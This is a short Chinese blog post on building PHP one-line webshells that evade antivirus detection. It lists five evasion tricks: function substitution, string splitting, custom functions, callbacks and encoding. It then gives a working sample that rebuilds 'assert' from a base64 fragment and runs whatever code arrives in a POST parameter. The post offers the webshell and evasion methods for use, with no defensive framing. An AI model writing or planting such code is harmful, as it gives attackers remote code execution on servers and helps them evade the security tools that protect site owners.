制作免杀一句话思路

  1. 函数替换
  2. 函数字符串拆分组合
  3. 自定义函数
  4. 回调函数
  5. 编码绕过

比如PHP

<?php
$a = base64_decode('YXNzZXh4');
$a = substr_replace($a,'rt',4);
$a($_POST['x']); 
?>

posted on 2021-05-18 10:56  tech_lee  阅读(57)  评论(0编辑  收藏  举报

导航